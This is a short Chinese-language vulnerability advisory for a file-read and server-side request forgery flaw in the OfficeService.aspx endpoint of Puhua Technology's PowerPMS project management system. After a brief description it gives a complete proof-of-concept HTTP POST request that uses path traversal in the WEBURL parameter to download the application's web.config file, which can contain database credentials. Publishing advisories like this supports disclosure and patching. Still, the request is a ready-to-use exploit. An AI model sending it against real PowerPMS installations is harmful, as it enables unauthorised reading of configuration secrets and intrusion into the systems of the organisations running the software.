普华科技 PowerPMS /PowerPlat/FormXml/DocFile/OfficeService.aspx 文件读取漏洞

日期: 2025-10-15 | 影响软件: 普华科技PowerPMS | POC: 已公开

漏洞描述

普华科技主要为石油化工、电力、水利、冶金、公路、港口、轨道交通、城市开发、房地产、生态环保等诸多行业提供项目管理咨询与信息化服务。该公司的PowPMS系统OfficeService.aspx 接口存在文件读取漏洞和服务端请求伪造漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件以及访问内网服务等等，导致网站处于极度不安全状态。

PoC代码

POST /PowerPlat/FormXml/DocFile/OfficeService.aspx HTTP/1.1
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15

action=download&WEBURL=app_data/../web.config